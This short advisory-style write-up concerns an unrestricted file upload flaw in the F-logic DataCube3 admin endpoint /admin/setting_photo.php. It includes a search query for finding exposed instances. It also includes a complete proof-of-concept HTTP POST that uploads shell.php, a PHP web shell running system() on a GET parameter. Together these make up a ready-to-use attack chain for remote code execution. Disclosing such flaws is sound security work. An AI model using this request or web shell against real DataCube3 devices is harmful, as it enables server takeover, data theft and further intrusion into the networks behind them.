An unrestricted file upload flaw exists within the setting_photo.php endpoint of the F-logic DataCube3 administrative panel (/admin/setting_photo.php). The application fails to adequately validate file extensions and MIME types before saving uploaded content to the server. By exploiting this weakness, an adversary can transmit a malicious payload—such as a PHP web shell—to the target system.

Successful exploitation grants the attacker the ability to execute arbitrary code on the underlying host. This can lead to complete system compromise, unauthorized data access, or the compromised server being leveraged as a pivot point for further internal network intrusion.

Asset Discovery

Identify vulnerable insatnces using the following search query:

title="DataCube3"

Exploitation Proof of Concept

The vulnerability can be triggered by sending a crafted multipart/form-data POST request to the vulnerable endpoint, bypassing any insufficient client-side or server-side validation mechanisms.

POST /admin/setting_photo.php HTTP/1.1
Host: target-server
Content-Type: multipart/form-data; boundary=----CustomBoundary

------CustomBoundary
Content-Disposition: form-data; name="uploaded_file"; filename="shell.php"
Content-Type: application/x-php

<?php echo system($_GET['cmd']); ?>
------CustomBoundary--